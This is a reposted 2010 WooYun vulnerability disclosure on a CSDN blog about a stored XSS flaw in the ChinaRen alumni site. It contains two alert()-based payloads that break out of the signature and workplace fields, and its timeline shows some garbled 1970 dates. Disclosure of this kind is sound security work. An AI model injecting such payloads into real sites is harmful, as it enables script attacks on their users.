chinaren校友录的永久xss漏洞

最新推荐文章于 2024-09-02 08:01:48 发布
最新推荐文章于 2024-09-02 08:01:48 发布
阅读量4.7k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188771
版权

漏洞详情

披露状态:

2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-27: 细节向公众公开

简要描述:

chinaren校友录的永久xss漏洞

详细说明:

chinaren校友录签名档、工作单位没有对xss做完整过滤,
签名档:
anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>
工作单位:
anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>

漏洞证明:

http://i.chinaren.com/u/anyunix@sogou

修复方案:

当然是过滤输出.

版权声明:转载请注明来源 anyunix@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Chinaren校友录
csdndownload11123的博客
01-24 8469
Chinaren校友录链接:http://alumni.chinaren.com/class/class_index.jsp?classuuid=2917034545012452392 ...
chinaren校友录xss漏洞
swordheart的博客
04-16 3156
漏洞详情 披露状态: 2010-07-27: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-26: 细节向公众公开 简要描述: chinaren校友录xss漏洞 详细说明: 在班级留言中,可插入图片,此处存在xss漏洞,不过仅影响IE6 漏洞证明: <img src="java
还有多少人记得ChinaRen校友录,它已经502…
热门推荐
运维派
08-24 4万+
如今访问这个网站,它已经显示502 Bad Gateway,令人唏嘘不已……对于80后这一代,曾经可以通过ChinaRen还能找到当年的小学、中学同学,不知道这里有多少小...
模仿chinaren超级校友录 -ASP源码.zip
01-22
"模仿chinaren超级校友录 -ASP源码.zip"是一个包含ASP源代码的压缩包,用于创建类似Chinaren超级校友录的网站平台。ASP(Active Server Pages)是微软开发的一种服务器端脚本语言,用于构建动态网页应用。通过学习和...
ChinaRen校友录助手
03-16
但必须是改用户已经在ChianRen校友录上有了班级信息. (2)支持多个班级的管理,班级个数不受限制. (3)支持多个用户的管理,用户之间互不影响. (4)自动下载班级留言,班级地址,成员信息,可以下载好友信息,可以将 ...
模仿chinaren超级校友录.rar
08-30
【标题】"模仿chinaren超级校友录.rar"是一款基于ASP技术构建的在线交友及会员管理系统,旨在模拟知名网站chinaren的校友录功能。这个压缩包包含了一整套用于创建类似平台的源代码,可能包括了数据库连接、用户注册...
模仿chinaren超级校友录.zip
10-05
【标题】:“模仿chinaren超级校友录” 这个项目标题表明,这是一个尝试复制或类似 Chinaren 超级校友录的功能的软件开发项目。Chinaren 是一个著名的中国社交网络平台,特别以其校友录服务闻名,它允许用户创建和...
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1580
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
网络安全漏洞挖掘
anquan2233的博客
08-29 1352
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1256
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-30 951
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 694
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
Oracle 网络安全产品安全认证检索
In-Memory Computing Technology
08-30 525
列入《网络关键设备和网络安全专用产品目录》的网络安全专用产品应当按照《信息安全技术网络安全专用产品安全技术要求》等相关国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供。Oracle Zero Data Loss Recovery Appliance (ZDLRA)属于此类,ZDLRA RA23于2024年7月通过网络安全专用产品安全检测,标志着这款产品完全符合中国政府对于安全产品的要求,包括技术及供应链安全要求。检测结果已在网信办官网上发布。
深度解析:防火墙技术在网络安全中的应用与发展
A526847的博客
08-28 504
网络安全领域,防火墙技术作为一道至关重要的防线,始终扮演着保护内部网络免受外部威胁侵害的关键角色。随着网络技术的不断演进和攻击手段的日益复杂,防火墙技术也在不断发展和完善,以应对不断升级的安全挑战。本文将对防火墙技术在网络安全中的应用与发展进行深度解析。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-30 2214
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
网络安全基础】网络安全的基本概念与威胁
最新发布
weixin_39372311的博客
09-02 679
网络安全是指保护计算机网络和系统免受未经授权的访问、攻击、损害或破坏的技术和实践。网络安全的目标是确保信息的机密性、完整性和可用性,简称CIA三要素。机密性:保证信息只能被授权的用户或系统访问和读取。完整性:确保信息在存储、传输或处理过程中不被未经授权的篡改或破坏。可用性:确保系统和数据在需要时可以被合法用户访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值